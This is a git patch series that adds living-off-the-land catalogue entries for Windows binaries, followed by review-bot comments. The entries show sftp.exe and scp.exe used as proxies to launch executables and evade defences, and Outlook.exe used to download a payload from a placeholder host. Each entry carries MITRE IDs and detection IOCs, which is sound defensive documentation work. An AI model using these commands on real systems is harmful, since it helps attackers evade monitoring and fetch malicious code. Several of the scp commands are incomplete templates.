From 860246fe1816001b186ab4f5e0347b81918ffd3c Mon Sep 17 00:00:00 2001 From: C-h4ck-0 <48152831+C-h4ck-0@users.noreply.github.com> Date: Sun, 6 Nov 2022 20:19:45 +0700 Subject: [PATCH 1/8] Add sftp.exe executor c:\windows\system32\openssh\sftp.exe with the -D flag, is able to execute another exe file --- yml/OSBinaries/sftp | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 yml/OSBinaries/sftp diff --git a/yml/OSBinaries/sftp b/yml/OSBinaries/sftp new file mode 100644 index 00000000..114b9f3e --- /dev/null +++ b/yml/OSBinaries/sftp @@ -0,0 +1,20 @@ +--- +Name: sftp.exe +Description: SSH File Transfer Protocol +Author: Nir Chako +Created: 2022-11-06 +Commands: + - Command: "sftp -D c:\windows\system32\notepad.exe" + Description: Execute notepad.exe with sftp.exe as parent process + Usecase: Use sftp.exe as a proxy binary to evade defensive counter-measures + Category: Execute + Privileges: User + MitreID: T1202 + OperatingSystem: Windows 10, Windows 11 +Full_Path: + - Path: c:\windows\system32\OpenSSH\sftp.exe +Detection: + - IOC: sftp.exe spawning unexpected processes +Acknowledgement: + - Person: 'Nir Chako (Pentera)' + Handle: '@C_h4ck_0' From da86328865090c6ee802789a4117b0e46ae93ad2 Mon Sep 17 00:00:00 2001 From: C-h4ck-0 <48152831+C-h4ck-0@users.noreply.github.com> Date: Sun, 6 Nov 2022 20:26:13 +0700 Subject: [PATCH 2/8] Rename sftp to sftp.yml --- yml/OSBinaries/{sftp => sftp.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename yml/OSBinaries/{sftp => sftp.yml} (100%) diff --git a/yml/OSBinaries/sftp b/yml/OSBinaries/sftp.yml similarity index 100% rename from yml/OSBinaries/sftp rename to yml/OSBinaries/sftp.yml From 8fafb0217113ce1e09068da26198c8da04c9686e Mon Sep 17 00:00:00 2001 From: C-h4ck-0 <48152831+C-h4ck-0@users.noreply.github.com> Date: Sun, 6 Nov 2022 20:31:24 +0700 Subject: [PATCH 3/8] fix yaml-lint syntax error --- yml/OSBinaries/sftp.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
diff --git a/yml/OSBinaries/sftp.yml b/yml/OSBinaries/sftp.yml index 114b9f3e..22396c96 100644 --- a/yml/OSBinaries/sftp.yml +++ b/yml/OSBinaries/sftp.yml @@ -4,7 +4,7 @@ Description: SSH File Transfer Protocol Author: Nir Chako Created: 2022-11-06 Commands: - - Command: "sftp -D c:\windows\system32\notepad.exe" + - Command: "sftp -D c:\\windows\\system32\\notepad.exe" Description: Execute notepad.exe with sftp.exe as parent process Usecase: Use sftp.exe as a proxy binary to evade defensive counter-measures Category: Execute From 0c0e242481037c01ee35504d451b777006338516 Mon Sep 17 00:00:00 2001 From: C-h4ck-0 <48152831+C-h4ck-0@users.noreply.github.com> Date: Tue, 8 Nov 2022 21:53:10 +0700 Subject: [PATCH 4/8] Add Outlook.exe downloader --- yml/OtherMSBinaries/Outlook.yml | 34 +++++++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 yml/OtherMSBinaries/Outlook.yml diff --git a/yml/OtherMSBinaries/Outlook.yml b/yml/OtherMSBinaries/Outlook.yml new file mode 100644 index 00000000..a7efcf35 --- /dev/null +++ b/yml/OtherMSBinaries/Outlook.yml 
@@ -0,0 +1,34 @@ +--- +Name: Outlook.exe +Description: Microsoft Office component +Author: Nir Chako +Created: 2022-11-08 +Commands: + - Command: Outlook.exe https://example.com/payload + Description: Downloads payload from remote server + Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 10, Windows 11 +Full_Path: + - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Outlook.exe + - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Outlook.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office16\Outlook.exe + - Path: C:\Program Files\Microsoft Office\Office16\Outlook.exe + - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\Outlook.exe + - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\Outlook.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office15\Outlook.exe + - Path: C:\Program Files\Microsoft Office\Office15\Outlook.exe + - Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\Outlook.exe + - Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\Outlook.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office14\Outlook.exe + - Path: C:\Program Files\Microsoft Office\Office14\Outlook.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office12\Outlook.exe + - Path: C:\Program Files\Microsoft Office\Office12\Outlook.exe + - Path: C:\Program Files\Microsoft Office\Office12\Outlook.exe +Detection: + - IOC: Suspicious Office application internet/network traffic +Acknowledgement: + - Person: Nir Chako (Pentera) + Handle: '@C_h4ck_0' From 613afe8ef59d1f6b7d0b0825f8480ffc2d7d43c7 Mon Sep 17 00:00:00 2001 
From: C-h4ck-0 <48152831+C-h4ck-0@users.noreply.github.com> Date: Sun, 13 Nov 2022 20:50:14 +0700 Subject: [PATCH 5/8] Create scp.yml Executor and Downloader --- yml/OSBinaries/scp.yml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 yml/OSBinaries/scp.yml diff --git a/yml/OSBinaries/scp.yml b/yml/OSBinaries/scp.yml new file mode 100644 index 00000000..f3b584bd --- /dev/null +++ b/yml/OSBinaries/scp.yml @@ -0,0 +1,28 @@ +--- +Name: scp.exe +Description: Secure Copy Protocol +Author: Nir Chako +Created: 2022-11-06 +Commands: + - Command: 'scp -S "C:\windows\system32\notepad.exe" file.txt localhost:' + Description: Execute notepad.exe with scp.exe as parent process + Usecase: Use scp.exe as a proxy binary to evade defensive counter-measures + Category: Execute + Privileges: User + MitreID: T1202 + OperatingSystem: Windows 10, Windows 11 + - Command: "scp @192.168.187.128: " + Description: Download file with scp.exe from am SSH server + Usecase: Use scp.exe to download file from an SSH server. If needed, you will be asked to submit a password as well. + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 10, Windows 11 +Full_Path: + - Path: c:\windows\system32\OpenSSH\scp.exe +Detection: + - IOC: scp.exe spawning unexpected processes + - IOC: Suspicious SSH internet/network traffic +Acknowledgement: + - Person: 'Nir Chako (Pentera)' + Handle: '@C_h4ck_0' From 354553efa3cddb5b8803813e0f05d6fbb5bb7603 Mon Sep 17 00:00:00 2001 From: C-h4ck-0 <48152831+C-h4ck-0@users.noreply.github.com> Date: Mon, 14 Nov 2022 12:04:58 +0700 Subject: [PATCH 6/8] Update scp.yml Added upload functionality --- yml/OSBinaries/scp.yml | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/yml/OSBinaries/scp.yml b/yml/OSBinaries/scp.yml index f3b584bd..73c72d83 100644 --- a/yml/OSBinaries/scp.yml +++ b/yml/OSBinaries/scp.yml 
@@ -12,12 +12,19 @@ Commands: MitreID: T1202 OperatingSystem: Windows 10, Windows 11 - Command: "scp @192.168.187.128: " - Description: Download file with scp.exe from am SSH server - Usecase: Use scp.exe to download file from an SSH server. If needed, you will be asked to submit a password as well. + Description: Download file with scp.exe from an SSH server + Usecase: Use scp.exe to download file from an SSH server. If needed, you will be asked to submit a password for the SSH session. Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 + - Command: "scp @192.168.187.128:" + Description: Upload file with scp.exe to an SSH server + Usecase: Use scp.exe to Upload file from the local machine to remote SSH server. If needed, you will be asked to submit a password for the SSH session. + Category: Upload + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: c:\windows\system32\OpenSSH\scp.exe Detection: From 519b5fcbd7100c6f0d19831ac04183eb71fb2adf Mon Sep 17 00:00:00 2001 From: C-h4ck-0 <48152831+C-h4ck-0@users.noreply.github.com> Date: Mon, 14 Nov 2022 12:33:41 +0700 Subject: [PATCH 7/8] Update scp.yml Added a copy functionality --- yml/OSBinaries/scp.yml | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/yml/OSBinaries/scp.yml b/yml/OSBinaries/scp.yml index 73c72d83..a322d357 100644 --- a/yml/OSBinaries/scp.yml +++ b/yml/OSBinaries/scp.yml @@ -25,6 +25,13 @@ Commands: Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 + - Command: "scp " + Description: Copy file with scp.exe to a local path + Usecase: Use scp.exe to Copy a file from one location to another. + Category: Copy + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: c:\windows\system32\OpenSSH\scp.exe Detection: From e39a3af314fc851b8a25e3f1c57fbdb59f2d5ca2 Mon Sep 17 00:00:00 2001 
From: C-h4ck-0 <48152831+C-h4ck-0@users.noreply.github.com> Date: Mon, 14 Nov 2022 12:36:40 +0700 Subject: [PATCH 8/8] Update scp.yml --- yml/OSBinaries/scp.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/scp.yml b/yml/OSBinaries/scp.yml index a322d357..8a895a25 100644 --- a/yml/OSBinaries/scp.yml +++ b/yml/OSBinaries/scp.yml @@ -2,7 +2,7 @@ Name: scp.exe Description: Secure Copy Protocol Author: Nir Chako -Created: 2022-11-06 +Created: 2022-11-14 Commands: - Command: 'scp -S "C:\windows\system32\notepad.exe" file.txt localhost:' Description: Execute notepad.exe with scp.exe as parent process
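Review bot: on the sftp.yml hunk in PATCH 1/8, the Detection IOC "sftp.exe spawning unexpected processes" does not say what is expected, so a detection engineer cannot act on it without first profiling sftp.exe themselves. Since the whole technique is the `-D` argument being started as a child of sftp.exe, the entry should also list the command-line pattern the Command line already shows, e.g. `- IOC: sftp.exe started with a -D argument pointing outside the OpenSSH directory`, so the IOC is usable on process-creation telemetry (command line plus parent/child) rather than only on an unspecified parent/child pair. Minor style point in the same hunk: Full_Path is written `c:\windows\system32\OpenSSH\sftp.exe` while Outlook.yml in the same series uses `C:\...`; pick one drive-letter casing for the series.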
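Review bot: the PATCH 3/8 hunk fixes the YAML parse error correctly (`\w` and `\s` are not valid escapes in a double-quoted scalar, so `"sftp -D c:\\windows\\system32\\notepad.exe"` is needed), but the later scp.yml entry in this series avoids the problem by single-quoting the Command (`'scp -S "C:\windows\system32\notepad.exe" file.txt localhost:'`). Using the same single-quoted form here, `- Command: 'sftp -D c:\windows\system32\notepad.exe'`, keeps the two OpenSSH entries consistent and keeps the Windows path readable as it would be typed.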
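Review bot: the Outlook.yml hunk in PATCH 4/8 lists `- Path: C:\Program Files\Microsoft Office\Office12\Outlook.exe` twice (the last two Full_Path entries are identical); drop one. Also, the Command puts the download URL directly on Outlook.exe's command line (`Outlook.exe https://example.com/payload`), which is visible in process-creation logs, so the Detection block should carry a process-level IOC such as `- IOC: Outlook.exe launched with an http:// or https:// URL as its command-line argument` next to the existing, much broader "Suspicious Office application internet/network traffic".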
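Review bot: in the scp.yml hunk of PATCH 5/8, the Download Command `"scp @192.168.187.128: "` has no user name, no remote file and no local destination, so it cannot be run as written and reads as a half-filled template. Spell it out, and use a placeholder host rather than a lab address, e.g. `- Command: 'scp user@remote-host:/path/to/file C:\Users\Public\file'`. The same hunk also sets `Created: 2022-11-06` on a file introduced in a commit dated 2022-11-13 (PATCH 8/8 later changes it to 2022-11-14).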
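Review bot: in the PATCH 6/8 hunk, the new Upload Command `"scp @192.168.187.128:"` is the Download Command with the trailing space removed, so the two entries are indistinguishable to a reader and neither shows the operand order that makes one an upload. The upload form needs the local file first and the remote target last, e.g. `- Command: 'scp C:\path\to\file user@remote-host:/path/'`. Small wording fix in the same hunk: "Use scp.exe to Upload file from the local machine" should read "Use scp.exe to upload a file from the local machine".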
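Review bot: the PATCH 7/8 hunk adds a Copy entry whose Command is just `"scp "`, with no source or destination, so it documents nothing a user could reproduce; it should show both local operands, e.g. `- Command: 'scp C:\path\to\source.txt C:\path\to\destination.txt'`. The entry also reuses `MitreID: T1105`, the same ID the hunk's neighbouring Download and Upload entries use for network transfer; confirm that mapping is intended for a purely local copy.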
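Review bot: the PATCH 8/8 hunk changes `Created` from 2022-11-06 to 2022-11-14, but scp.yml was first added in PATCH 5/8, dated 2022-11-13; if `Created` is meant to record when the entry was created rather than last edited, 2022-11-13 is the value to use. Either way, the note in the commit message ("Update scp.yml") should say what was updated so the date change is not mistaken for a content change.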